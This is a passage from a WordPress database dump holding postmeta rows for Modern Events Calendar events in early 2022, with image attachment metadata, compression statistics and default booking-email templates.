/>\r\n%%blog_name%%</p>\";}}'),(153159,266185,'passster_activate_global_protection',NULL),(153160,266185,'passster_activate_protection',NULL),(153161,266185,'passster_protection_type','password'),(153163,266185,'_dp_original','266104'),(153164,266185,'_edit_lock','1642897818:2'),(153165,266185,'_edit_last','2'),(153166,266186,'_wp_attached_file','2022/01/girl-with-flower-1.jpg'),(153167,266186,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:30:\"2022/01/girl-with-flower-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"girl-with-flower-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"girl-with-flower-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:30:\"girl-with-flower-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:30:\"girl-with-flower-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:30:\"girl-with-flower-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:30:\"girl-with-flower-1-300x380.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"girl-with-flower-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(153168,266185,'_thumbnail_id','266186'),(153169,266186,'original-file','2022/01/girl-with-flower-1-updraft-pre-smush-original.jpg'),(153170,266186,'smush-complete','1'),(153171,266186,'smush-info','The file was compressed from 56.86 KB to 54.81 KB saving 3.62 percent using WP-Optimize'),(153172,266186,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:58228;s:12:\"smushed-size\";i:56121;s:15:\"savings-percent\";d:3.62000000000000010658141036401502788066864013671875;}'),(153173,266188,'protect_children',''),(153174,266188,'mec_color',''),(153175,266188,'mec_location_id','118'),(153176,266188,'mec_dont_show_map','0'),(153177,266188,'mec_organizer_id','1'),(153178,266188,'mec_read_more',''),(153179,266188,'mec_more_info',''),(153180,266188,'mec_more_info_title',''),(153181,266188,'mec_more_info_target','_self'),(153182,266188,'mec_cost',''),(153183,266188,'mec_currency','a:0:{}'),(153184,266188,'mec_additional_organizer_ids','a:0:{}'),(153185,266188,'mec_additional_location_ids','a:0:{}'),(153186,266188,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-03-11\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-03-11\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(153187,266188,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(153188,266188,'mec_certain_weekdays','a:0:{}'),(153189,266188,'mec_allday','0'),(153190,266188,'one_occurrence','0'),(153191,266188,'mec_hide_time','0'),(153192,266188,'mec_hide_end_time','0'),(153193,266188,'mec_comment',''),(153194,266188,'mec_timezone','global'),(153195,266188,'mec_countdown_method','global'),(153196,266188,'mec_public','1'),(153197,266188,'mec_start_date','2022-03-11'),(153198,266188,'mec_start_time_hour','7'),(153199,266188,'mec_start_time_minutes','0'),(153200,266188,'mec_start_time_ampm','PM'),(153201,266188,'mec_start_day_seconds','68400'),(153202,266188,'mec_end_date','2022-03-11'),(153203,266188,'mec_end_time_hour','8'),(153204,266188,'mec_end_time_minutes','0'),(153205,266188,'mec_end_time_ampm','PM'),(153206,266188,'mec_end_day_seconds','72000'),(153207,266188,'mec_repeat_status','0'),(153208,266188,'mec_repeat_type',''),(153209,266188,'mec_repeat_interval','1'),(153210,266188,'mec_repeat_end',''),(153211,266188,'mec_repeat_end_at_occurrences',''),(153212,266188,'mec_repeat_end_at_date',''),(153213,266188,'mec_advanced_days','a:0:{}'),(153214,266188,'mec_in_days',''),(153215,266188,'mec_not_in_days',''),(153216,266188,'mec_hourly_schedules','a:0:{}'),(153217,266188,'mec_booking','a:0:{}'),(153218,266188,'mec_tickets','a:0:{}'),(153219,266188,'mec_fees_global_inheritance','1'),(153220,266188,'mec_fees','a:0:{}'),(153221,266188,'mec_ticket_variations_global_inheritance','1'),(153222,266188,'mec_ticket_variations','a:0:{}'),(153223,266188,'mec_reg_fields_global_inheritance','1'),(153224,266188,'mec_reg_fields','a:0:{}'),(153225,266188,'mec_bfixed_fields','a:0:{}'),(153226,266188,'mec_op','a:0:{}'),(153227,266188,'mec_fields','a:0:{}'),(153228,266188,'mec_event_status','EventScheduled'),(153229,266188,'mec_moved_online_link',''),(153230,266188,'mec_cancelled_reason',''),(153231,266188,'mec_display_cancellation_reason_in_single_page',''),(153232,266188,'boldgrid_hide_page_title','0'),(153233,266188,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(153234,266188,'passster_activate_global_protection',NULL),(153235,266188,'passster_activate_protection',NULL),(153236,266188,'passster_protection_type','password'),(153238,266188,'_dp_original','266104'),(153239,266188,'_edit_lock','1642898569:2'),(153240,266188,'_edit_last','2'),(153241,266189,'_wp_attached_file','2022/01/woman-in-light-1.jpg'),(153242,266189,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:28:\"2022/01/woman-in-light-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"woman-in-light-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"woman-in-light-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:28:\"woman-in-light-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:28:\"woman-in-light-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:28:\"woman-in-light-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:28:\"woman-in-light-1-300x380.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"woman-in-light-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(153243,266188,'_thumbnail_id','266189'),(153244,266189,'original-file','2022/01/woman-in-light-1-updraft-pre-smush-original.jpg'),(153245,266189,'smush-complete','1'),(153246,266189,'smush-info','The file was compressed from 46.58 KB to 45.48 KB saving 2.35 percent using WP-Optimize'),(153247,266189,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:47699;s:12:\"smushed-size\";i:46576;s:15:\"savings-percent\";d:2.350000000000000088817841970012523233890533447265625;}'),(153248,266191,'protect_children',''),(153249,266191,'mec_color',''),(153250,266191,'mec_location_id','118'),(153251,266191,'mec_dont_show_map','0'),(153252,266191,'mec_organizer_id','1'),(153253,266191,'mec_read_more',''),(153254,266191,'mec_more_info',''),(153255,266191,'mec_more_info_title',''),(153256,266191,'mec_more_info_target','_self'),(153257,266191,'mec_cost',''),(153258,266191,'mec_currency','a:0:{}'),(153259,266191,'mec_additional_organizer_ids','a:0:{}'),(153260,266191,'mec_additional_location_ids','a:0:{}'),(153261,266191,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-08\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-08\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(153262,266191,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(153263,266191,'mec_certain_weekdays','a:0:{}'),(153264,266191,'mec_allday','0'),(153265,266191,'one_occurrence','0'),(153266,266191,'mec_hide_time','0'),(153267,266191,'mec_hide_end_time','0'),(153268,266191,'mec_comment',''),(153269,266191,'mec_timezone','global'),(153270,266191,'mec_countdown_method','global'),(153271,266191,'mec_public','1'),(153272,266191,'mec_start_date','2022-04-08'),(153273,266191,'mec_start_time_hour','7'),(153274,266191,'mec_start_time_minutes','0'),(153275,266191,'mec_start_time_ampm','PM'),(153276,266191,'mec_start_day_seconds','68400'),(153277,266191,'mec_end_date','2022-04-08'),(153278,266191,'mec_end_time_hour','8'),(153279,266191,'mec_end_time_minutes','0'),(153280,266191,'mec_end_time_ampm','PM'),(153281,266191,'mec_end_day_seconds','72000'),(153282,266191,'mec_repeat_status','0'),(153283,266191,'mec_repeat_type',''),(153284,266191,'mec_repeat_interval','1'),(153285,266191,'mec_repeat_end',''),(153286,266191,'mec_repeat_end_at_occurrences',''),(153287,266191,'mec_repeat_end_at_date',''),(153288,266191,'mec_advanced_days','a:0:{}'),(153289,266191,'mec_in_days',''),(153290,266191,'mec_not_in_days',''),(153291,266191,'mec_hourly_schedules','a:0:{}'),(153292,266191,'mec_booking','a:0:{}'),(153293,266191,'mec_tickets','a:0:{}'),(153294,266191,'mec_fees_global_inheritance','1'),(153295,266191,'mec_fees','a:0:{}'),(153296,266191,'mec_ticket_variations_global_inheritance','1'),(153297,266191,'mec_ticket_variations','a:0:{}'),(153298,266191,'mec_reg_fields_global_inheritance','1'),(153299,266191,'mec_reg_fields','a:0:{}'),(153300,266191,'mec_bfixed_fields','a:0:{}'),(153301,266191,'mec_op','a:0:{}'),(153302,266191,'mec_fields','a:0:{}'),(153303,266191,'mec_event_status','EventScheduled'),(153304,266191,'mec_moved_online_link',''),(153305,266191,'mec_cancelled_reason',''),(153306,266191,'mec_display_cancellation_reason_in_single_page',''),(153307,266191,'boldgrid_hide_page_title','0'),(153308,266191,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(153309,266191,'passster_activate_global_protection',NULL),(153310,266191,'passster_activate_protection',NULL),(153311,266191,'passster_protection_type','password'),(153313,266191,'_dp_original','266104'),(153314,266191,'_edit_lock','1642974361:2'),(153315,266191,'_edit_last','2'),(153316,266191,'_thumbnail_id','265902'),(153317,266194,'protect_children',''),(153318,266194,'mec_color',''),(153319,266194,'mec_location_id','118'),(153320,266194,'mec_dont_show_map','0'),(153321,266194,'mec_organizer_id','1'),(153322,266194,'mec_read_more',''),(153323,266194,'mec_more_info',''),(153324,266194,'mec_more_info_title',''),(153325,266194,'mec_more_info_target','_self'),(153326,266194,'mec_cost',''),(153327,266194,'mec_currency','a:0:{}'),(153328,266194,'mec_additional_organizer_ids','a:0:{}'),(153329,266194,'mec_additional_location_ids','a:0:{}'),(153330,266194,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-02-02\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-02-02\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(153331,266194,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(153332,266194,'mec_certain_weekdays','a:0:{}'),(153333,266194,'mec_allday','0'),(153334,266194,'one_occurrence','0'),(153335,266194,'mec_hide_time','0'),(153336,266194,'mec_hide_end_time','0'),(153337,266194,'mec_comment',''),(153338,266194,'mec_timezone','global'),(153339,266194,'mec_countdown_method','global'),(153340,266194,'mec_public','1'),(153341,266194,'mec_start_date','2022-02-02'),(153342,266194,'mec_start_time_hour','7'),(153343,266194,'mec_start_time_minutes','0'),(153344,266194,'mec_start_time_ampm','PM'),(153345,266194,'mec_start_day_seconds','68400'),(153346,266194,'mec_end_date','2022-02-02'),(153347,266194,'mec_end_time_hour','8'),(153348,266194,'mec_end_time_minutes','0'),(153349,266194,'mec_end_time_ampm','PM'),(153350,266194,'mec_end_day_seconds','72000'),(153351,266194,'mec_repeat_status','0'),(153352,266194,'mec_repeat_type',''),(153353,266194,'mec_repeat_interval','1'),(153354,266194,'mec_repeat_end',''),(153355,266194,'mec_repeat_end_at_occurrences',''),(153356,266194,'mec_repeat_end_at_date',''),(153357,266194,'mec_advanced_days','a:0:{}'),(153358,266194,'mec_in_days',''),(153359,266194,'mec_not_in_days',''),(153360,266194,'mec_hourly_schedules','a:0:{}'),(153361,266194,'mec_booking','a:0:{}'),(153362,266194,'mec_tickets','a:0:{}'),(153363,266194,'mec_fees_global_inheritance','1'),(153364,266194,'mec_fees','a:0:{}'),(153365,266194,'mec_ticket_variations_global_inheritance','1'),(153366,266194,'mec_ticket_variations','a:0:{}'),(153367,266194,'mec_reg_fields_global_inheritance','1'),(153368,266194,'mec_reg_fields','a:0:{}'),(153369,266194,'mec_bfixed_fields','a:0:{}'),(153370,266194,'mec_op','a:0:{}'),(153371,266194,'mec_fields','a:0:{}'),(153372,266194,'mec_event_status','EventScheduled'),(153373,266194,'mec_moved_online_link',''),(153374,266194,'mec_cancelled_reason',''),(153375,266194,'mec_display_cancellation_reason_in_single_page',''),(153376,266194,'boldgrid_hide_page_title','0'),(153377,266194,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(153378,266194,'passster_activate_global_protection',NULL),(153379,266194,'passster_activate_protection',NULL),(153380,266194,'passster_protection_type','password'),(153382,266194,'_dp_original','266104'),(153383,266194,'_edit_lock','1642975565:2'),(153384,266194,'_edit_last','2'),(153385,266194,'_thumbnail_id','266179'),(153386,266195,'protect_children',''),(153387,266195,'mec_color',''),(153388,266195,'mec_location_id','118'),(153389,266195,'mec_dont_show_map','0'),(153390,266195,'mec_organizer_id','1'),(153391,266195,'mec_read_more',''),(153392,266195,'mec_more_info',''),(153393,266195,'mec_more_info_title',''),(153394,266195,'mec_more_info_target','_self'),(153395,266195,'mec_cost',''),(153396,266195,'mec_currency','a:0:{}'),(153397,266195,'mec_additional_organizer_ids','a:0:{}'),(153398,266195,'mec_additional_location_ids','a:0:{}'),(153399,266195,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-03-02\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-03-02\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(153400,266195,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(153401,266195,'mec_certain_weekdays','a:0:{}'),(153402,266195,'mec_allday','0'),(153403,266195,'one_occurrence','0'),(153404,266195,'mec_hide_time','0'),(153405,266195,'mec_hide_end_time','0'),(153406,266195,'mec_comment',''),(153407,266195,'mec_timezone','global'),(153408,266195,'mec_countdown_method','global'),(153409,266195,'mec_public','1'),(153410,266195,'mec_start_date','2022-03-02'),(153411,266195,'mec_start_time_hour','7'),(153412,266195,'mec_start_time_minutes','0'),(153413,266195,'mec_start_time_ampm','PM'),(153414,266195,'mec_start_day_seconds','68400'),(153415,266195,'mec_end_date','2022-03-02'),(153416,266195,'mec_end_time_hour','8'),(153417,266195,'mec_end_time_minutes','0'),(153418,266195,'mec_end_time_ampm','PM'),(153419,266195,'mec_end_day_seconds','72000'),(153420,266195,'mec_repeat_status','0'),(153421,266195,'mec_repeat_type',''),(153422,266195,'mec_repeat_interval','1'),(153423,266195,'mec_repeat_end',''),(153424,266195,'mec_repeat_end_at_occurrences',''),(153425,266195,'mec_repeat_end_at_date',''),(153426,266195,'mec_advanced_days','a:0:{}'),(153427,266195,'mec_in_days',''),(153428,266195,'mec_not_in_days',''),(153429,266195,'mec_hourly_schedules','a:0:{}'),(153430,266195,'mec_booking','a:0:{}'),(153431,266195,'mec_tickets','a:0:{}'),(153432,266195,'mec_fees_global_inheritance','1'),(153433,266195,'mec_fees','a:0:{}'),(153434,266195,'mec_ticket_variations_global_inheritance','1'),(153435,266195,'mec_ticket_variations','a:0:{}'),(153436,266195,'mec_reg_fields_global_inheritance','1'),(153437,266195,'mec_reg_fields','a:0:{}'),(153438,266195,'mec_bfixed_fields','a:0:{}'),(153439,266195,'mec_op','a:0:{}'),(153440,266195,'mec_fields','a:0:{}'),(153441,266195,'mec_event_status','EventScheduled'),(153442,266195,'mec_moved_online_link',''),(153443,266195,'mec_cancelled_reason',''),(153444,266195,'mec_display_cancellation_reason_in_single_page',''),(153445,266195,'boldgrid_hide_page_title','0'),(153446,266195,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(153447,266195,'passster_activate_global_protection',NULL),(153448,266195,'passster_activate_protection',NULL),(153449,266195,'passster_protection_type','password'),(153450,266195,'_dp_original','266104'),(153451,266195,'_edit_lock','1642975486:2'),(153452,266195,'_edit_last','2'),(153453,266195,'_thumbnail_id','266179'),(153454,266196,'protect_children',''),(153455,266196,'mec_color',''),(153456,266196,'mec_location_id','118'),(153457,266196,'mec_dont_show_map','0'),(153458,266196,'mec_organizer_id','1'),(153459,266196,'mec_read_more',''),(153460,266196,'mec_more_info',''),(153461,266196,'mec_more_info_title',''),(153462,266196,'mec_more_info_target','_self'),(153463,266196,'mec_cost',''),(153464,266196,'mec_currency','a:0:{}'),(153465,266196,'mec_additional_organizer_ids','a:0:{}'),(153466,266196,'mec_additional_location_ids','a:0:{}'),(153467,266196,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-02-21\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-02-21\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(153468,266196,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(153469,266196,'mec_certain_weekdays','a:0:{}'),(153470,266196,'mec_allday','0'),(153471,266196,'one_occurrence','0'),(153472,266196,'mec_hide_time','0'),(153473,266196,'mec_hide_end_time','0'),(153474,266196,'mec_comment',''),(153475,266196,'mec_timezone','global'),(153476,266196,'mec_countdown_method','global'),(153477,266196,'mec_public','1'),(153478,266196,'mec_start_date','2022-02-21'),(153479,266196,'mec_start_time_hour','3'),(153480,266196,'mec_start_time_minutes','0'),(153481,266196,'mec_start_time_ampm','PM'),(153482,266196,'mec_start_day_seconds','54000'),(153483,266196,'mec_end_date','2022-02-21'),(153484,266196,'mec_end_time_hour','4'),(153485,266196,'mec_end_time_minutes','0'),(153486,266196,'mec_end_time_ampm','PM'),(153487,266196,'mec_end_day_seconds','57600'),(153488,266196,'mec_repeat_status','0'),(153489,266196,'mec_repeat_type',''),(153490,266196,'mec_repeat_interval','1'),(153491,266196,'mec_repeat_end',''),(153492,266196,'mec_repeat_end_at_occurrences',''),(153493,266196,'mec_repeat_end_at_date',''),(153494,266196,'mec_advanced_days','a:0:{}'),(153495,266196,'mec_in_days',''),(153496,266196,'mec_not_in_days',''),(153497,266196,'mec_hourly_schedules','a:0:{}'),(153498,266196,'mec_booking','a:0:{}'),(153499,266196,'mec_tickets','a:0:{}'),(153500,266196,'mec_fees_global_inheritance','1'),(153501,266196,'mec_fees','a:0:{}'),(153502,266196,'mec_ticket_variations_global_inheritance','1'),(153503,266196,'mec_ticket_variations','a:0:{}'),(153504,266196,'mec_reg_